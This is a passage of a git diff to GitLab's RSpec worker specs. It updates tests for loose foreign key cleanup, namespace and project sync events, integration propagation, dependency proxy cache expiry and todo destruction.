544be2a69a6..3c628d036ff 100644 --- a/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb +++ b/spec/workers/loose_foreign_keys/cleanup_worker_spec.rb @@ -27,43 +27,40 @@ RSpec.describe LooseForeignKeys::CleanupWorker do migration.track_record_deletions(:_test_loose_fk_parent_table_2) end - let!(:parent_model_1) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_parent_table_1' - - include LooseForeignKey - - loose_foreign_key :_test_loose_fk_child_table_1_1, :parent_id, on_delete: :async_delete - loose_foreign_key :_test_loose_fk_child_table_1_2, :parent_id_with_different_column, on_delete: :async_nullify - end - end - - let!(:parent_model_2) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_parent_table_2' - - include LooseForeignKey - - loose_foreign_key :_test_loose_fk_child_table_2_1, :parent_id, on_delete: :async_delete - end - end - - let!(:child_model_1) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_1_1' - end - end - - let!(:child_model_2) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_1_2' - end - end - - let!(:child_model_3) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_2_1' - end + let(:all_loose_foreign_key_definitions) do + { + '_test_loose_fk_parent_table_1' => [ + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_1_1', + '_test_loose_fk_parent_table_1', + { + column: 'parent_id', + on_delete: :async_delete, + gitlab_schema: :gitlab_main + } + ), + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_1_2', + '_test_loose_fk_parent_table_1', + { + column: 'parent_id_with_different_column', + on_delete: :async_nullify, + gitlab_schema: :gitlab_main + } + ) + ], + '_test_loose_fk_parent_table_2' => [ + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_2_1', + 
'_test_loose_fk_parent_table_2', + { + column: 'parent_id', + on_delete: :async_delete, + gitlab_schema: :gitlab_main + } + ) + ] + } end let(:loose_fk_parent_table_1) { table(:_test_loose_fk_parent_table_1) } @@ -87,6 +84,8 @@ RSpec.describe LooseForeignKeys::CleanupWorker do end before do + allow(Gitlab::Database::LooseForeignKeys).to receive(:definitions_by_table).and_return(all_loose_foreign_key_definitions) + parent_record_1 = loose_fk_parent_table_1.create! loose_fk_child_table_1_1.create!(parent_id: parent_record_1.id) loose_fk_child_table_1_2.create!(parent_id_with_different_column: parent_record_1.id) @@ -98,8 +97,8 @@ RSpec.describe LooseForeignKeys::CleanupWorker do parent_record_3 = loose_fk_parent_table_2.create! 5.times { loose_fk_child_table_2_1.create!(parent_id: parent_record_3.id) } - parent_model_1.delete_all - parent_model_2.delete_all + loose_fk_parent_table_1.delete_all + loose_fk_parent_table_2.delete_all end it 'cleans up all rows' do diff --git a/spec/workers/namespaces/process_sync_events_worker_spec.rb b/spec/workers/namespaces/process_sync_events_worker_spec.rb new file mode 100644 index 00000000000..59be1fffdb4 --- /dev/null +++ b/spec/workers/namespaces/process_sync_events_worker_spec.rb @@ -0,0 +1,32 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Namespaces::ProcessSyncEventsWorker do + let!(:group1) { create(:group) } + let!(:group2) { create(:group) } + let!(:group3) { create(:group) } + + include_examples 'an idempotent worker' + + describe '#perform' do + subject(:perform) { described_class.new.perform } + + before do + group2.update!(parent: group1) + group3.update!(parent: group2) + end + + it 'consumes all sync events' do + expect { perform }.to change(Namespaces::SyncEvent, :count).from(5).to(0) + end + + it 'syncs namespace hierarchy traversal ids' do + expect { perform }.to change(Ci::NamespaceMirror, :all).to contain_exactly( + an_object_having_attributes(namespace_id: group1.id, traversal_ids: 
[group1.id]), + an_object_having_attributes(namespace_id: group2.id, traversal_ids: [group1.id, group2.id]), + an_object_having_attributes(namespace_id: group3.id, traversal_ids: [group1.id, group2.id, group3.id]) + ) + end + end +end diff --git a/spec/workers/projects/process_sync_events_worker_spec.rb b/spec/workers/projects/process_sync_events_worker_spec.rb new file mode 100644 index 00000000000..600fbbc6b20 --- /dev/null +++ b/spec/workers/projects/process_sync_events_worker_spec.rb @@ -0,0 +1,28 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Projects::ProcessSyncEventsWorker do + let!(:group) { create(:group) } + let!(:project) { create(:project) } + + include_examples 'an idempotent worker' + + describe '#perform' do + subject(:perform) { described_class.new.perform } + + before do + project.update!(namespace: group) + end + + it 'consumes all sync events' do + expect { perform }.to change(Projects::SyncEvent, :count).from(2).to(0) + end + + it 'syncs project namespace id' do + expect { perform }.to change(Ci::ProjectMirror, :all).to contain_exactly( + an_object_having_attributes(namespace_id: group.id) + ) + end + end +end diff --git a/spec/workers/propagate_integration_worker_spec.rb b/spec/workers/propagate_integration_worker_spec.rb index 902e3206d35..030caefb833 100644 --- a/spec/workers/propagate_integration_worker_spec.rb +++ b/spec/workers/propagate_integration_worker_spec.rb @@ -18,7 +18,7 @@ RSpec.describe PropagateIntegrationWorker do end it 'calls the propagate service with the integration' do - expect(Admin::PropagateIntegrationService).to receive(:propagate).with(integration) + expect(Integrations::PropagateService).to receive(:propagate).with(integration) subject.perform(integration.id) end diff --git a/spec/workers/purge_dependency_proxy_cache_worker_spec.rb b/spec/workers/purge_dependency_proxy_cache_worker_spec.rb index 393745958be..b928104fb58 100644 --- 
a/spec/workers/purge_dependency_proxy_cache_worker_spec.rb +++ b/spec/workers/purge_dependency_proxy_cache_worker_spec.rb @@ -4,18 +4,18 @@ require 'spec_helper' RSpec.describe PurgeDependencyProxyCacheWorker do let_it_be(:user) { create(:admin) } - let_it_be(:blob) { create(:dependency_proxy_blob )} - let_it_be(:group, reload: true) { blob.group } - let_it_be(:manifest) { create(:dependency_proxy_manifest, group: group )} + let_it_be_with_refind(:blob) { create(:dependency_proxy_blob )} + let_it_be_with_reload(:group) { blob.group } + let_it_be_with_refind(:manifest) { create(:dependency_proxy_manifest, group: group )} let_it_be(:group_id) { group.id } subject { described_class.new.perform(user.id, group_id) } describe '#perform' do - shared_examples 'not removing blobs and manifests' do - it 'does not remove blobs and manifests', :aggregate_failures do - expect { subject }.not_to change { group.dependency_proxy_blobs.size } - expect { subject }.not_to change { group.dependency_proxy_manifests.size } + shared_examples 'not expiring blobs and manifests' do + it 'does not expire blobs and manifests', :aggregate_failures do + expect { subject }.not_to change { blob.status } + expect { subject }.not_to change { manifest.status } expect(subject).to be_nil end end @@ -25,39 +25,36 @@ RSpec.describe PurgeDependencyProxyCacheWorker do include_examples 'an idempotent worker' do let(:job_args) { [user.id, group_id] } - it 'deletes the blobs and returns ok', :aggregate_failures do - expect(group.dependency_proxy_blobs.size).to eq(1) - expect(group.dependency_proxy_manifests.size).to eq(1) - + it 'expires the blobs and returns ok', :aggregate_failures do subject - expect(group.dependency_proxy_blobs.size).to eq(0) - expect(group.dependency_proxy_manifests.size).to eq(0) + expect(blob).to be_expired + expect(manifest).to be_expired end end end context 'when admin mode is disabled' do - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and 
manifests' end end context 'a non-admin user' do let(:user) { create(:user) } - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end context 'an invalid user id' do let(:user) { double('User', id: 99999 ) } - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end context 'an invalid group' do let(:group_id) { 99999 } - it_behaves_like 'not removing blobs and manifests' + it_behaves_like 'not expiring blobs and manifests' end end end diff --git a/spec/workers/todos_destroyer/private_features_worker_spec.rb b/spec/workers/todos_destroyer/private_features_worker_spec.rb index f346a004670..88d9be051d0 100644 --- a/spec/workers/todos_destroyer/private_features_worker_spec.rb +++ b/spec/workers/todos_destroyer/private_features_worker_spec.rb @@ -6,7 +6,7 @@ RSpec.describe TodosDestroyer::PrivateFeaturesWorker do it "calls the Todos::Destroy::PrivateFeaturesService with the params it was given" do service = double - expect(::Todos::Destroy::PrivateFeaturesService).to receive(:new).with(100, nil).and_return(service) + expect(::Todos::Destroy::UnauthorizedFeaturesService).to receive(:new).with(100, nil).and_return(service) expect(service).to receive(:execute) described_class.new.perform(100) |